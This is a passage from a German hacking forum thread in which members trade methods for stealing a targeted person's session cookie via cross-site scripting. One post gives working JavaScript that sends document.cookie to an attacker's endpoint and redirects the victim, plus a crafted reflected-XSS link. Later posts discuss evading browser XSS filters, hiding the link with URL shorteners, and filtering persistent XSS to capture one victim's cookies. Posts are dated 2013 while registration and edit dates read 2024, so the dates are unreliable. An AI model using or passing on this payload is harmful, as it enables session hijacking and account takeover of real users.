|
|
|
|
| 10.10.2013, 21:11 | #11 |
|
Coderz Mitglied
Registriert seit: 31.10.2024
Beiträge: 97
Thanks: 9
Thanked 17 Times in 8 Posts
 |
Warum umständlich? Einfacher gehts ja fast nicht mehr
Ehrlich gesagt ist es mir egal wer damit was macht.
__________________
MfG Dr.ChAoS |
|
| 11.10.2013, 09:38 | #12 |
|
Coderz Mitglied
Registriert seit: 18.05.2024
Beiträge: 15
Thanks: 1
Thanked 6 Times in 4 Posts
|
Naja, wenn ich einer bestimmten Person den Sessioncookie stehlen wollte, würde ich ihr einen manipulierten Link schicken:
Hier würde mein Script liegen: http://localhost/script.js Der Inhalt des Scripts: function createXMLHttpObj(){
if(window.XMLHttpRequest){ return new XMLHttpRequest(); }
return new ActiveXObject("Microsoft.XMLHTTP");
}
function sendRequest(method, url, async, data){
xmlhttp = createXMLHttpObj();
if(!xmlhttp){ return; }
xmlhttp.open(method, url, async);
if(method == "POST"){ xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded;'); }
xmlhttp.send(data);
if(!async){ return xmlhttp.responseText; }
}
sendRequest("POST", "http://localhost/x.php", true, document.cookie);
document.location = "http://zwinky.com";
http://zwinky..."><script src=http://localhost/script.js></script> Fertig. Ist eben NICHT persistent und daher sehr stealthy - ratz |
|
|
| 11.10.2013, 14:07 | #13 |
|
Coderz Mitglied
Registriert seit: 31.10.2024
Beiträge: 97
Thanks: 9
Thanked 17 Times in 8 Posts
|
Das ist zwar auch eine Möglichkeit, diese hat aber drei entscheidende Nachteile:
1. Browser wie Chrome und der IE besitzen eine XSS-Protection, d.h. Script Tags werden aus der URL gefiltert. Mir ist nur der Firefox noch bekannt welcher keinen derartigen Schutz bietet. 2. Die Urls sind nicht wirklich "stealthy" wie ich finde. Weil wenn ich einen Script Tag oder eine ewig lange Kette von %27%22%3E... in der URL entdecke werde ich da sicher nicht drauf klicken^^. Vielleicht klappt das bei manchen Leuten noch mit einem URL-Shortener wie bit.ly. 3. Da diese Methode nicht persistent ist bekommt man die Daten von Usern welche zufällig auf dem Profil landen nicht. Kann aber wie du schon gesagt hast auch ein Vorteil sein, denn dann merkt auch keiner was bzw nicht so schnell.
__________________
MfG Dr.ChAoS Geändert von Dr.ChAoS (11.10.2024 um 17:41 Uhr) Grund: Schreibfehler... |
|
|
| 11.10.2013, 14:11 | #14 |
|
Coderz Mitglied
Registriert seit: 18.05.2024
Beiträge: 15
Thanks: 1
Thanked 6 Times in 4 Posts
|
1. Stimme ich voll und ganz zu
2. Hm...meine Erfahrungn zeigen, dass das den meisten Leuten Wurst is 3. ob persistent oder reflekiert muss man je nach Anwendungsfall selbst entscheiden. Außerdem könnt ihr beim persistenten trotzdem immernoch eine Filterfunktion einbauen, sodass ihr nur die Cookies einer bestimmten Person bekommt - ratz |
|
|
| Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1) | |
| Themen-Optionen | |
| Ansicht | |
|
|
Alle Zeitangaben in WEZ +2. Es ist jetzt 08:35 Uhr.
